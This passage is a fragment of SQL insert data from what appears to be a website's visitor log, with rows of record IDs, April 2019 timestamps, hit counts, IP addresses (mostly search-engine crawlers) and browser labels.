,0,'8.29.198.27','other'),(411925,1554949455,2,2,0,0,'66.249.64.58','chrome'),(411926,1554949469,1,1,0,0,'157.55.39.139','other'),(411927,1554949756,1,1,0,0,'8.29.198.27','other'),(411928,1554951521,1,1,0,0,'109.74.154.72','chrome'),(411929,1554951888,1,1,0,0,'207.46.13.77','other'),(411930,1554952225,1,1,0,0,'95.108.181.57','other'),(411931,1554952301,1,1,0,0,'37.9.113.148','other'),(411932,1554953128,1,1,0,0,'5.45.207.76','other'),(411933,1554953182,1,1,0,0,'178.154.244.11','other'),(411934,1554953260,4,4,0,0,'46.161.14.130','firefox'),(411935,1554954274,1,1,0,0,'141.8.142.191','other'),(411936,1554954514,1,0,1,0,'66.249.64.29',''),(411937,1554954653,1,1,0,0,'157.55.39.148','other'),(411938,1554954822,1,1,0,0,'13.66.139.0','other'),(411939,1554956968,1,1,0,0,'66.249.64.30','chrome'),(411940,1554957372,1,1,0,0,'207.46.13.198','other'),(411941,1554957762,1,1,0,0,'207.46.13.77','other'),(411942,1554957780,1,1,0,0,'157.55.39.148','other'),(411943,1554958422,1,1,0,0,'95.163.255.95','other'),(411944,1554958992,1,1,0,0,'66.249.64.62','chrome'),(411945,1554959345,1,1,0,0,'66.249.64.29','chrome'),(411946,1554959397,1,1,0,0,'52.53.201.78','chrome'),(411947,1554959629,1,1,0,0,'8.29.198.27','other'),(411948,1554960507,1,1,0,0,'109.70.100.19','other'),(411949,1554960606,1,1,0,0,'8.29.198.26','other'),(411950,1554961414,1,1,0,0,'213.180.203.61','other'),(411951,1554961420,1,1,0,0,'37.54.77.228','chrome'),(411952,1554961638,2,2,0,0,'66.249.64.29','chrome'),(411953,1554961698,1,1,0,0,'178.154.200.48','other'),(411954,1554961980,1,1,0,0,'87.250.224.64','other'),(411955,1554961995,2,2,0,0,'141.8.142.162','other'),(411956,1554962159,1,1,0,0,'95.108.181.83','other'),(411957,1554963160,1,1,0,0,'66.249.64.29','chrome'),(411958,1554963505,1,1,0,0,'91.196.178.173','chrome'),(411959,1554964723,1,1,0,0,'91.196.178.66','chrome'),(411960,1554964741,1,1,0,0,'66.249.64.30','chrome'),(411961,1554965311,1,1,0,0,'157.55.39.102','other'),(411962,1554965803,3,3,0,0,'66.249.64.30','chrome'),(411963,1554965819,1,1,0,0,'95.132.30.6','chrome'),(411964,1554966417,1,1,0,0,'66.249.64.31','chrome'),(411965,1554966556,1,1,0,0,'207.46.13.69','other'),(411966,1554966648,1,1,0,0,'40.77.167.118','other'),(411967,1554967175,1,1,0,0,'40.77.167.109','other'),(411968,1554967734,1,1,0,0,'92.112.125.218','chrome'),(411969,1554967929,1,1,0,0,'95.163.255.99','other'),(411970,1554968033,1,1,0,0,'66.249.64.31','chrome'),(411971,1554969560,1,1,0,0,'95.163.255.96','other'),(411972,1554969564,1,1,0,0,'95.163.255.95','other'),(411973,1554969868,1,1,0,0,'31.43.21.35','chrome'),(411974,1554970072,1,1,0,0,'95.108.181.96','other'),(411975,1554970245,1,1,0,0,'87.250.224.107','other'),(411976,1554970465,1,1,0,0,'8.29.198.25','other'),(411977,1554970631,1,1,0,0,'87.250.224.81','other'),(411978,1554970665,1,1,0,0,'91.124.182.170','firefox'),(411979,1554970787,1,1,0,0,'141.8.142.38','other'),(411980,1554970883,1,1,0,0,'157.55.39.178','other'),(411981,1554971169,1,1,0,0,'87.250.224.64','other'),(411982,1554971415,1,1,0,0,'66.249.64.29','chrome'),(411983,1554971450,1,1,0,0,'8.29.198.27','other'),(411984,1554971729,1,1,0,0,'78.46.208.244','chrome'),(411985,1554971927,1,1,0,0,'66.249.64.31','chrome'),(411986,1554972710,3,3,0,0,'157.55.39.193','other'),(411987,1554973451,1,1,0,0,'195.10.210.70','chrome'),(411988,1554973542,1,1,0,0,'109.207.193.98','chrome'),(411989,1554975072,1,1,0,0,'66.249.64.29','chrome'),(411990,1554975168,1,1,0,0,'66.249.64.30','chrome'),(411991,1554975747,1,1,0,0,'157.55.39.182','other'),(411992,1554976752,1,1,0,0,'91.196.178.179','chrome'),(411993,1554976824,2,2,0,0,'66.249.64.29','chrome'),(411994,1554976936,3,3,0,0,'66.249.64.30','chrome'),(411995,1554977438,1,1,0,0,'157.55.39.67','other'),(411996,1554977675,1,1,0,0,'158.46.223.48','chrome'),(411997,1554977677,1,1,0,0,'207.46.13.18','other'),(411998,1554977939,1,1,0,0,'66.249.64.30','chrome'),(411999,1554978384,1,1,0,0,'157.55.39.65','other'),(412000,1554979400,1,1,0,0,'13.66.139.0','other'),(412001,1554980202,1,1,0,0,'5.45.207.8','other'),(412002,1554980575,1,1,0,0,'207.46.13.117','other'),(412003,1554980577,1,1,0,0,'37.9.113.38','other'),(412004,1554980800,1,1,0,0,'178.154.200.48','other'),(412005,1554980855,1,1,0,0,'37.9.113.20','other'),(412006,1554980887,2,2,0,0,'178.154.171.69','other'),(412007,1554980936,1,1,0,0,'95.108.181.83','other'),(412008,1554981054,1,1,0,0,'178.154.171.17','other'),(412009,1554981143,1,1,0,0,'66.249.64.30','chrome'),(412010,1554981211,1,1,0,0,'178.154.244.11','other'),(412011,1554981314,1,1,0,0,'8.29.198.27','other'),(412012,1554981482,1,1,0,0,'87.250.224.47','other'),(412013,1554981579,1,1,0,0,'207.46.13.117','other'),(412014,1554981710,1,1,0,0,'176.214.13.246','msie'),(412015,1554982289,1,1,0,0,'8.29.198.25','other'),(412016,1554982961,1,1,0,0,'66.249.64.30','chrome'),(412017,1554983267,1,1,0,0,'130.180.218.136','chrome'),(412018,1554983445,1,1,0,0,'207.46.13.12','other'),(412019,1554984500,1,1,0,0,'66.249.64.31','chrome'),(412020,1554984797,1,1,0,0,'40.77.167.210','other'),(412021,1554984920,1,1,0,0,'207.46.13.12','other'),(412022,1554985300,2,2,0,0,'178.94.103.68','chrome'),(412023,1554985491,1,1,0,0,'66.249.64.31','chrome'),(412024,1554986371,1,1,0,0,'66.249.64.29','chrome'),(412025,1554986511,1,1,0,0,'95.163.255.96','other'),(412026,1554986798,2,2,0,0,'192.99.35.149','other'),(412027,1554986825,14,14,0,0,'192.99.35.149','chrome'),(412028,1554986864,1,1,0,0,'13.57.233.99','chrome'),(412029,1554987105,1,1,0,0,'46.133.196.67','chrome'),(412030,1554987341,1,1,0,0,'195.10.210.49','chrome'),(412031,1554988425,1,1,0,0,'66.249.64.58','chrome'),(412032,1554988447,2,2,0,0,'66.249.64.29','chrome'),(412033,1554988730,1,1,0,0,'82.207.49.98','chrome'),(412034,1554988982,1,1,0,0,'194.242.100.82','chrome'),(412035,1554989080,1,1,0,0,'91.196.178.66','chrome'),(412036,1554990417,1,1,0,0,'95.163.255.93','other'),(412037,1554990523,1,1,0,0,'180.76.15.15','other'),(412038,1554990585,1,1,0,0,'207.46.13.145','other'),(412039,1554990605,1,1,0,0,'46.200.229.76','chrome'),(412040,1554990855,1,1,0,0,'40.77.167.93','other'),(412041,1554991126,1,1,0,0,'40.77.167.144','other'),(412042,1554991425,4,4,0,0,'5.45.207.79','other'),(412043,1554992157,1,1,0,0,'8.29.198.26','other'),(412044,1554992227,1,1,0,0,'141.8.142.81','other'),(412045,1554992255,1,1,0,0,'95.108.213.50','other'),(412046,1554992265,1,1,0,0,'178.154.171.17','other'),(412047,1554992294,1,1,0,0,'87.250.224.64','other'),(412048,1554992317,1,1,0,0,'178.154.200.48','other'),(412049,1554992524,1,1,0,0,'180.76.15.153','other'),(412050,1554992903,1,1,0,0,'40.77.167.144','other'),(412051,1554992929,1,1,0,0,'185.201.115.21','chrome'),(412052,1554993146,1,1,0,0,'8.29.198.25','other'),(412053,1554993292,1,1,0,0,'66.249.64.60','chrome'),(412054,1554993653,1,1,0,0,'66.249.64.62','chrome'),(412055,1554994848,2,2,0,0,'66.249.64.58','chrome'),(412056,1554995263,1,1,0,0,'66.249.64.29','chrome'),(412057,1554996722,1,1,0,0,'157.55.39.185','other'),(412058,1554996860,1,1,0,0,'91.196.178.173','chrome'),(412059,1554997316,1,1,0,0,'40.77.167.79','other'),(412060,1554997631,1,1,0,0,'95.163.255.94','other'),(412061,1554997634,1,1,0,0,'95.163.255.92','other'),(412062,1554997753,3,3,0,0,'66.249.64.29','chrome'),(412063,1554997808,1,1,0,0,'95.163.255.93','other'),(412064,1554997854,1,1,0,0,'40.77.167.219','other'),(412065,1554999120,1,1,0,0,'193.106.30.98','firefox'),(412066,1554999305,2,2,0,0,'66.249.64.29','chrome'),(412067,1554999625,2,2,0,0,'40.77.167.79','other'),(412068,1554999705,1,1,0,0,'87.250.224.47','other'),(412069,1554999723,3,3,0,0,'178.154.244.11','other'),(412070,1554999967,1,1,0,0,'157.55.39.185','other'),(412071,1555000060,1,1,0,0,'5.45.207.19','other'),(412072,1555000069,2,2,0,0,'5.45.207.79','other'),(412073,1555000699,1,1,0,0,'40.77.167.219','other'),(412074,1555001848,1,1,0,0,'95.163.255.99','other'),(412075,1555002982,1,1,0,0,'66.249.66.218','chrome'),(412076,1555002991,1,1,0,0,'8.29.198.25','other'),(412077,1555003680,2,2,0,0,'176.9.9.94','other'),(412078,1555003988,1,1,0,0,'8.29.198.25','other'),(412079,1555004580,1,1,0,0,'40.77.167.79','other'),(412080,1555004686,2,2,0,0,'66.249.66.222','chrome'),(412081,1555004876,1,1,0,0,'66.249.66.218','chrome'),(412082,1555005967,1,1,0,0,'40.77.167.151','other'),(412083,1555006022,4,4,0,0,'46.96.22.15','chrome'),(412084,1555007171,1,1,0,0,'5.45.207.79','other'),(412085,1555007317,1,1,0,0,'40.77.167.79','other'),(412086,1555007342,1,1,0,0,'66.249.66.218','chrome'),(412087,1555007809,1,1,0,0,'157.55.39.185','other'),(412088,1555008262,2,2,0,0,'66.249.66.218','chrome'),(412089,1555008342,2,2,0,0,'66.249.66.220','chrome'),(412090,1555008860,1,1,0,0,'40.77.167.219','other'),(412091,1555009405,1,0,1,0,'66.249.66.220',''),(412092,1555009822,2,2,0,0,'66.249.66.218','chrome'),(412093,1555009966,1,1,0,0,'157.55.39.185','other'),(412094,1555011249,1,1,0,0,'66.249.66.218','chrome'),(412095,1555011480,2,2,0,0,'66.249.66.130','chrome'),(412096,1555011562,1,1,0,0,'157.55.39.185','other'),(412097,1555012060,1,1,0,0,'40.77.167.219','other'),(412098,1555012171,2,2,0,0,'5.45.207.19','other'),(412099,1555012206,1,1,0,0,'5.45.207.79','other'),(412100,1555012332,1,1,0,0,'66.249.66.218','chrome'),(412101,1555012869,1,1,0,0,'95.163.255.92','other'),(412102,1555013530,1,1,0,0,'5.45.207.19','other'),(412103,1555013735,1,1,0,0,'157.55.39.69','other'),(412104,1555013822,1,1,0,0,'8.29.198.25','other'),(412105,1555013934,1,1,0,0,'66.249.66.218','chrome'),(412106,1555014104,1,1,0,0,'66.249.66.132','chrome'),(412107,1555014245,1,1,0,0,'91.196.178.84','firefox'),(412108,1555014546,1,1,0,0,'180.76.15.10','other'),(412109,1555014683,1,1,0,0,'95.163.255.92','other'),(412110,1555014820,2,2,0,0,'157.55.39.69','other'),(412111,1555014821,1,1,0,0,'8.29.198.27','other'),(412112,1555014940,2,2,0,0,'207.46.13.8','other'),(412113,1555017312,1,1,0,0,'176.9.9.94','other'),(412114,1555018033,1,1,0,0,'37.9.113.103','other'),(412115,1555018256,1,1,0,0,'5.45.207.19','other'),(412116,1555018701,1,1,0,0,'95.163.255.93','other'),(412117,1555021741,2,2,0,0,'157.55.39.69','other'),(412118,1555022956,1,1,0,0,'207.46.13.174','other'),(412119,1555023373,2,2,0,0,'51.77.52.160','other'),(412120,1555023451,1,1,0,0,'95.108.213.4','other'),(412121,1555023706,1,1,0,0,'87.250.224.47','other'),(412122,1555024217,1,1,0,0,'95.163.255.97','other'),(412123,1555024660,1,1,0,0,'8.29.198.27','other'),(412124,1555025648,1,1,0,0,'8.29.198.25','other'),(412125,1555026116,1,1,0,0,'66.249.66.132','chrome'),(412126,1555026541,1,1,0,0,'66.249.66.128','chrome'),(412127,1555026567,1,1,0,0,'66.249.66.222','chrome'),(412128,1555028924,1,1,0,0,'87.250.224.81','other'),(412129,1555028977,1,1,0,0,'37.9.113.148','other'),(412130,1555029097,1,1,0,0,'5.45.207.19','other'),(412131,1555029120,1,1,0,0,'207.46.13.224','other'),(412132,1555029185,1,1,0,0,'46.166.188.248','other'),(412133,1555029278,1,1,0,0,'213.180.203.61','other'),(412134,1555029825,1,1,0,0,'178.154.171.69','other'),(412135,1555030093,1,1,0,0,'157.55.39.69','other'),(412136,1555031293,1,1,0,0,'13.66.139.0','other'),(412137,1555031390,1,1,0,0,'66.249.66.220','chrome'),(412138,1555031467,1,1,0,0,'180.76.15.7','other'),(412139,1555031866,1,1,0,0,'95.163.255.95','other'),(412140,1555032186,1,1,0,0,'40.77.167.176','other'),(412141,1555032682,1,1,0,0,'95.108.213.4','other'),(412142,1555034392,1,1,0,0,'157.55.39.227','other'),(412143,1555034926,1,1,0,0,'40.77.167.176','other'),(412144,1555035499,1,1,0,0,'8.29.198.26','other'),(412145,1555035589,1,1,0,0,'157.55.39.227','other'),(412146,1555035861,1,1,0,0,'95.163.255.97','other'),(412147,1555036112,1,1,0,0,'95.108.213.50','other'),(412148,1555036475,1,1,0,0,'8.29.198.25','other'),(412149,1555037239,2,2,0,0,'66.249.66.220','chrome'),(412150,1555037447,1,1,0,0,'95.163.255.96','other'),(412151,1555037877,1,1,0,0,'109.74.154.72','chrome'),(412152,1555038374,1,1,0,0,'104.148.64.26','chrome'),(412153,1555038380,1,1,0,0,'66.249.66.132','chrome'),(412154,1555038382,1,1,0,0,'207.46.13.174','other'),(412155,1555038828,1,1,0,0,'178.154.244.11','other'),(412156,1555038948,2,2,0,0,'54.202.0.149','chrome'),(412157,1555039535,1,1,0,0,'207.46.13.36','other'),(412158,1555039656,1,1,0,0,'66.249.66.218','chrome'),(412159,1555040229,1,1,0,0,'157.55.39.227','other'),(412160,1555041226,1,1,0,0,'95.163.255.94','other'),(412161,1555041913,1,1,0,0,'207.46.13.161','other'),(412162,1555041981,1,1,0,0,'207.46.13.36','other'),(412163,1555042495,1,1,0,0,'40.77.167.176','other'),(412164,1555042944,1,1,0,0,'5.45.207.79','other'),(412165,1555043637,1,1,0,0,'176.9.9.94','other'),(412166,1555043716,2,2,0,0,'157.55.39.227','other'),(412167,1555044408,1,1,0,0,'66.249.66.222','chrome'),(412168,1555044985,1,1,0,0,'66.249.66.218','chrome'),(412169,1555045246,1,1,0,0,'207.46.13.161','other'),(412170,1555046234,1,1,0,0,'66.249.66.218','chrome'),(412171,1555046336,1,1,0,0,'8.29.198.27','other'),(412172,1555046851,1,1,0,0,'185.220.101.32','other'),(412173,1555047309,1,1,0,0,'8.29.198.27','other'),(412174,1555047462,1,1,0,0,'157.55.39.51','other'),(412175,1555048068,1,1,0,0,'40.77.167.120','other'),(412176,1555048257,1,1,0,0,'95.108.181.94','other'),(412177,1555048531,1,1,0,0,'95.163.255.97','other'),(412178,1555048600,1,1,0,0,'91.196.178.73','chrome'),(412179,1555048610,1,1,0,0,'5.45.207.79','other'),(412180,1555048988,1,1,0,0,'37.9.113.20','other'),(412181,1555049268,1,1,0,0,'207.46.13.183','other'),(412182,1555049958,1,1,0,0,'178.154.244.11','other'),(412183,1555051381,1,1,0,0,'46.201.80.14','chrome'),(412184,1555051489,1,1,0,0,'42.236.10.117','other'),(412185,1555051507,1,1,0,0,'180.163.220.5','other'),(412186,1555051515,1,1,0,0,'42.236.10.78','other'),(412187,1555051536,1,1,0,0,'66.249.65.214','chrome'),(412188,1555051675,1,1,0,0,'42.236.10.93','other'),(412189,1555051897,1,1,0,0,'5.45.207.79','other'),(412190,1555052904,1,1,0,0,'157.55.39.51','other'),(412191,1555052920,1,1,0,0,'66.249.73.9','chrome'),(412192,1555053181,2,2,0,0,'66.249.65.212','chrome'),(412193,1555053905,1,1,0,0,'40.77.167.120','other'),(412194,1555054188,1,1,0,0,'91.196.178.73','chrome'),(412195,1555054272,1,1,0,0,'95.163.255.94','other'),(412196,1555055514,1,1,0,0,'91.196.178.59','chrome'),(412197,1555055656,1,1,0,0,'95.108.213.50','other'),(412198,1555055659,1,1,0,0,'5.255.253.16','other'),(412199,1555055835,3,3,0,0,'5.45.207.19','other'),(412200,1555055865,1,1,0,0,'178.154.244.11','other'),(412201,1555055962,1,1,0,0,'37.9.113.103','other'),(412202,1555057021,1,1,0,0,'176.9.9.94','other'),(412203,1555057170,1,1,0,0,'8.29.198.25','other'),(412204,1555057228,1,1,0,0,'40.77.167.120','other'),(412205,1555057493,1,1,0,0,'213.180.203.61','other'),(412206,1555058007,1,1,0,0,'66.249.65.214','chrome'),(412207,1555058162,1,1,0,0,'8.29.198.25','other'),(412208,1555058345,1,1,0,0,'95.163.255.96','other'),(412209,1555058835,1,1,0,0,'91.196.178.73','chrome'),(412210,1555060679,1,1,0,0,'66.249.65.214','chrome'),(412211,1555060753,2,2,0,0,'95.158.49.55','other'),(412212,1555060776,2,2,0,0,'207.46.13.61','other'),(412213,1555062130,1,1,0,0,'207.46.13.61','other'),(412214,1555062416,1,1,0,0,'91.209.11.236','other'),(412215,1555062698,1,1,0,0,'91.196.179.134','chrome'),(412216,1555063290,1,1,0,0,'157.55.39.104','other'),(412217,1555063434,2,2,0,0,'37.9.113.20','other'),(412218,1555063471,2,2,0,0,'95.158.49.55','other'),(412219,1555063509,4,4,0,0,'178.154.244.11','other'),(412220,1555064196,1,1,0,0,'66.249.65.216','chrome'),(412221,1555064255,1,1,0,0,'87.250.224.47','other'),(412222,1555064497,1,1,0,0,'178.154.244.11','other'),(412223,1555065238,1,1,0,0,'95.163.255.94','other'),(412224,1555065660,1,1,0,0,'66.249.73.9','chrome'),(412225,1555065705,3,3,0,0,'66.249.65.214','chrome'),(412226,1555065709,1,1,0,0,'157.55.39.104','other'),(412227,1555067432,1,1,0,0,'88.198.39.184','msie'),(412228,1555067794,1,1,0,0,'157.55.39.51','other'),(412229,1555068000,1,1,0,0,'8.29.198.25','other'),(412230,1555068699,1,1,0,0,'207.46.13.57','other'),(412231,1555068751,2,2,0,0,'176.9.9.94','other'),(412232,1555068997,1,1,0,0,'8.29.198.25','other'),(412233,1555070009,1,1,0,0,'66.249.65.214','chrome'),(412234,1555070218,1,1,0,0,'207.46.13.153','other'),(412235,1555070536,1,1,0,0,'66.249.65.216','chrome'),(412236,1555071081,1,1,0,0,'95.163.255.95','other'),(412237,1555071169,1,1,0,0,'95.163.255.98','other'),(412238,1555071172,1,1,0,0,'95.163.255.94','other'),(412239,1555071912,1,1,0,0,'207.46.13.57','other'),(412240,1555072210,1,1,0,0,'66.249.65.212','chrome'),(412241,1555072666,2,2,0,0,'66.249.65.216','chrome'),(412242,1555073449,1,1,0,0,'209.17.97.58','other'),(412243,1555073543,3,3,0,0,'5.45.207.19','other'),(412244,1555074060,1,1,0,0,'66.249.65.214','chrome'),(412245,1555074734,1,1,0,0,'66.249.73.9','chrome'),(412246,1555074752,2,2,0,0,'66.249.65.212','chrome'),(412247,1555075915,1,1,0,0,'157.55.39.88','other'),(412248,1555077036,1,1,0,0,'157.55.39.88','other'),(412249,1555077634,1,1,0,0,'95.163.255.95','other'),(412250,1555077689,1,1,0,0,'66.249.73.7','chrome'),(412251,1555077715,1,1,0,0,'66.249.65.212','chrome'),(412252,1555077907,1,1,0,0,'180.76.15.14','other'),(412253,1555078842,1,1,0,0,'8.29.198.25','other'),(412254,1555079009,1,1,0,0,'157.55.39.88','other'),(412255,1555079377,1,1,0,0,'66.249.65.214','chrome'),(412256,1555079855,1,1,0,0,'8.29.198.25','other'),(412257,1555080945,1,1,0,0,'66.249.65.216','chrome'),(412258,1555081454,1,1,0,0,'40.77.167.30','other'),(412259,1555081956,2,2,0,0,'157.55.39.224','other'),(412260,1555082291,1,1,0,0,'95.163.255.92','other'),(412261,1555082400,3,3,0,0,'66.249.65.216','chrome'),(412262,1555083101,1,1,0,0,'46.211.130.248','chrome'),(412263,1555083396,1,1,0,0,'141.8.142.103','other'),(412264,1555083439,1,1,0,0,'5.45.207.79','other'),(412265,1555083556,1,1,0,0,'95.108.213.4','other'),(412266,1555083679,1,1,0,0,'37.9.113.20','other'),(412267,1555083825,1,1,0,0,'5.45.207.19','other'),(412268,1555084322,1,1,0,0,'176.9.9.94','other'),(412269,1555085044,1,1,0,0,'157.55.39.88','other'),(412270,1555085413,1,1,0,0,'62.210.83.78','firefox'),(412271,1555088228,1,1,0,0,'66.249.65.214','chrome'),(412272,1555088263,1,1,0,0,'207.46.13.209','other'),(412273,1555088649,1,1,0,0,'157.55.39.224','other'),(412274,1555088917,1,1,0,0,'66.249.65.216','chrome'),(412275,1555089454,1,1,0,0,'193.19.119.113','chrome'),(412276,1555089693,1,1,0,0,'8.29.198.26','other'),(412277,1555090075,1,1,0,0,'193.19.119.110','chrome'),(412278,1555090299,2,2,0,0,'66.249.65.214','chrome'),(412279,1555090300,1,1,0,0,'157.55.39.171','other'),(412280,1555090692,1,1,0,0,'8.29.198.25','other'),(412281,1555091331,1,1,0,0,'66.249.65.212','chrome'),(412282,1555091710,1,1,0,0,'180.76.15.7','other'),(412283,1555091835,1,1,0,0,'95.163.255.98','other'),(412284,1555092317,1,1,0,0,'185.158.112.114','chrome'),(412285,1555093177,2,2,0,0,'5.45.207.79','other'),(412286,1555093318,2,2,0,0,'66.249.65.212','chrome'),(412287,1555093493,1,1,0,0,'66.249.73.9','chrome'),(412288,1555093760,1,1,0,0,'66.249.65.214','chrome'),(412289,1555093785,1,1,0,0,'178.154.244.11','other'),(412290,1555093834,1,1,0,0,'40.77.167.133','other'),(412291,1555094446,1,1,0,0,'66.249.65.216','chrome'),(412292,1555095924,1,1,0,0,'157.55.39.171','other'),(412293,1555095949,1,1,0,0,'66.249.65.216','chrome'),(412294,1555097608,1,1,0,0,'46.188.31.187','msie'),(412295,1555097741,2,2,0,0,'207.46.13.86','other'),(412296,1555097900,1,1,0,0,'66.249.65.212','chrome'),(412297,1555099458,4,4,0,0,'66.249.65.212','chrome'),(412298,1555100518,1,1,0,0,'193.106.30.98','firefox'),(412299,1555100531,1,1,0,0,'8.29.198.27','other'),(412300,1555101523,1,1,0,0,'8.29.198.25','other'),(412301,1555102388,2,2,0,0,'5.45.207.19','other'),(412302,1555102565,1,1,0,0,'178.154.171.69','other'),(412303,1555103003,1,1,0,0,'141.8.142.103','other'),(412304,1555103015,1,1,0,0,'178.154.244.11','other'),(412305,1555103096,1,1,0,0,'91.196.178.136','chrome'),(412306,1555103134,1,1,0,0,'207.46.13.36','other'),(412307,1555104619,1,1,0,0,'95.163.255.94','other'),(412308,1555104626,1,0,1,0,'66.249.65.212',''),(412309,1555104671,1,1,0,0,'66.249.65.214','chrome'),(412310,1555104809,1,1,0,0,'66.249.65.212','chrome'),(412311,1555105601,1,1,0,0,'37.9.113.148','other'),(412312,1555106191,1,1,0,0,'66.249.65.214','chrome'),(412313,1555106616,1,1,0,0,'157.55.39.9','other'),(412314,1555106875,83,83,0,0,'46.4.60.249','other'),(412315,1555107535,1,1,0,0,'40.77.167.125','other'),(412316,1555107696,53,53,0,0,'173.208.200.154','other'),(412317,1555108826,1,1,0,0,'176.9.9.94','other'),(412318,1555108871,1,1,0,0,'95.163.255.94','other'),(412319,1555108888,1,1,0,0,'95.163.255.99','other'),(412320,1555109013,1,1,0,0,'157.55.39.9','other'),(412321,1555110491,1,1,0,0,'5.45.207.79','other'),(412323,1555110812,1,1,0,0,'157.55.39.9','other'),(412324,1555111366,1,1,0,0,'8.29.198.26','other'),(412325,1555112363,1,1,0,0,'8.29.198.27','other'),(412326,1555114518,1,1,0,0,'95.163.255.98','other'),(412327,1555115367,1,1,0,0,'66.249.65.214','chrome'),(412328,1555115511,1,1,0,0,'207.46.13.103','other'),(412329,1555116446,1,1,0,0,'141.8.142.103','other'),(412330,1555117554,1,1,0,0,'207.46.13.193','other'),(412331,1555119250,1,1,0,0,'176.9.9.94','other'),(412332,1555119451,1,1,0,0,'5.45.207.19','other'),(412333,1555120639,1,1,0,0,'207.46.13.193','other'),(412334,1555122067,1,1,0,0,'111.206.52.124','chrome'),(412335,1555122138,6,6,0,0,'207.46.13.194','other'),(412336,1555122199,1,1,0,0,'8.29.198.26','other'),(412337,1555122815,9,9,0,0,'207.46.13.193','other'),(412338,1555122822,2,2,0,0,'87.250.224.47','other'),(412339,1555122993,5,5,0,0,'157.55.39.99','other'),(412340,1555123050,4,4,0,0,'207.46.13.154','other'),(412341,1555123089,1,1,0,0,'37.9.113.20','other'),(412342,1555123193,1,1,0,0,'8.29.198.26','other'),(412343,1555123362,1,1,0,0,'37.9.113.103','other'),(412344,1555123500,1,1,0,0,'178.154.244.11','other'),(412345,1555127281,1,1,0,0,'95.163.255.93','other'),(412346,1555127289,1,1,0,0,'88.198.39.184','msie'),(412347,1555127819,2,2,0,0,'157.55.39.192','other'),(412348,1555128799,2,2,0,0,'157.55.39.192','other'),(412349,1555129332,1,1,0,0,'157.55.39.75','other'),(412350,1555130101,1,1,0,0,'157.55.39.192','other'),(412351,1555130391,1,1,0,0,'178.154.171.27','other'),(412352,1555132075,126,126,0,0,'5.189.159.208','other'),(412353,1555132264,1,1,0,0,'37.9.113.148','other'),(412354,1555132371,1,1,0,0,'87.250.224.47','other'),(412355,1555132414,1,1,0,0,'141.8.142.81','other'),(412356,1555132670,1,1,0,0,'213.180.203.40','other'),(412357,1555132675,1,1,0,0,'95.108.213.50','other'),(412358,1555132945,2,2,0,0,'95.108.181.54','other'),(412359,1555132977,16,16,0,0,'5.189.159.208','other'),(412360,1555133028,1,1,0,0,'8.29.198.27','other'),(412361,1555133177,1,1,0,0,'185.220.102.8','other'),(412362,1555133249,1,1,0,0,'66.249.65.216','chrome'),(412363,1555133375,1,1,0,0,'66.249.65.212','chrome'),(412364,1555133510,1,1,0,0,'37.9.113.148','other'),(412365,1555133527,1,1,0,0,'178.154.244.11','other'),(412366,1555133751,1,1,0,0,'91.196.178.175','chrome'),(412367,1555133798,1,1,0,0,'178.154.244.65','other'),(412368,1555133800,1,1,0,0,'95.108.181.57','other'),(412369,1555134032,1,1,0,0,'8.29.198.26','other'),(412370,1555134099,1,1,0,0,'66.249.65.214','chrome'),(412371,1555134442,2,2,0,0,'34.211.48.240','chrome'),(412372,1555134768,1,1,0,0,'66.249.73.9','chrome'),(412373,1555134809,1,1,0,0,'157.55.39.78','other'),(412374,1555137061,1,1,0,0,'157.55.39.78','other'),(412375,1555137383,1,1,0,0,'157.55.39.155','other'),(412376,1555137584,1,1,0,0,'66.249.64.30','chrome'),(412377,1555140838,1,1,0,0,'66.249.64.30','chrome'),(412378,1555141157,1,1,0,0,'157.55.39.78','other'),(412379,1555141311,1,1,0,0,'157.55.39.75','other'),(412380,1555141860,2,2,0,0,'157.55.39.155','other'),(412381,1555142105,1,1,0,0,'37.9.113.103','other'),(412382,1555142257,1,1,0,0,'141.8.142.103','other'),(412383,1555142766,1,1,0,0,'213.180.203.61','other'),(412384,1555142769,1,1,0,0,'5.45.207.76','other'),(412385,1555142844,1,1,0,0,'141.8.142.38','other'),(412386,1555143093,1,1,0,0,'5.45.207.8','other'),(412387,1555143269,1,1,0,0,'178.154.244.65','other'),(412388,1555143392,1,1,0,0,'66.249.64.30','chrome'),(412389,1555143809,1,1,0,0,'207.46.13.170','other'),(412390,1555143868,2,2,0,0,'66.249.64.29','chrome'),(412391,1555143870,1,1,0,0,'8.29.198.26','other'),(412392,1555143916,1,1,0,0,'95.163.255.93','other'),(412393,1555144727,1,1,0,0,'207.46.13.170','other'),(412394,1555144874,1,1,0,0,'8.29.198.27','other'),(412395,1555145167,1,1,0,0,'66.249.64.62','chrome'),(412396,1555145269,1,1,0,0,'66.249.64.31','chrome'),(412397,1555145494,6,6,0,0,'46.101.9.216','chrome'),(412398,1555145908,1,1,0,0,'109.74.154.72','chrome'),(412399,1555146080,1,1,0,0,'66.249.64.60','chrome'),(412400,1555146142,1,1,0,0,'207.46.13.127','other'),(412401,1555146525,1,1,0,0,'13.66.139.0','other'),(412402,1555146631,1,1,0,0,'66.249.64.30','chrome'),(412403,1555147418,1,1,0,0,'209.17.96.202','other'),(412404,1555147975,1,1,0,0,'95.163.255.94','other'),(412405,1555148016,1,1,0,0,'95.163.255.96','other'),(412406,1555149756,1,1,0,0,'178.154.171.69','other'),(412407,1555149774,1,1,0,0,'95.108.181.94','other'),(412408,1555149777,1,1,0,0,'141.8.183.11','other'),(412409,1555149780,1,1,0,0,'87.250.224.99','other'),(412410,1555150125,1,1,0,0,'40.77.167.205','other'),(412411,1555150352,1,1,0,0,'157.55.39.155','other'),(412412,1555150792,1,1,0,0,'95.108.213.4','other'),(412413,1555151157,1,1,0,0,'95.108.181.96','other'),(412414,1555151455,1,1,0,0,'77.41.226.148','msie'),(412415,1555151607,1,1,0,0,'66.249.64.29','chrome'),(412416,1555151651,1,1,0,0,'66.249.64.58','chrome'),(412417,1555152094,1,1,0,0,'66.249.64.30','chrome'),(412418,1555152609,1,1,0,0,'66.249.64.31','chrome'),(412419,1555153573,1,1,0,0,'66.249.64.31','chrome'),(412420,1555153811,2,2,0,0,'66.249.64.62','chrome'),(412421,1555154640,2,2,0,0,'66.249.64.30','chrome'),(412422,1555154709,1,1,0,0,'8.29.198.25','other'),(412423,1555154724,1,1,0,0,'40.77.167.205','other'),(412424,1555154871,2,2,0,0,'66.249.64.29','chrome'),(412425,1555155713,1,1,0,0,'8.29.198.27','other'),(412426,1555156253,2,2,0,0,'178.154.244.49','other'),(412427,1555156359,2,2,0,0,'95.108.181.83','other'),(412428,1555156397,1,1,0,0,'178.154.244.11','other'),(412429,1555156414,1,1,0,0,'141.8.142.103','other'),(412430,1555156446,1,1,0,0,'5.255.253.16','other'),(412431,1555156618,1,1,0,0,'178.154.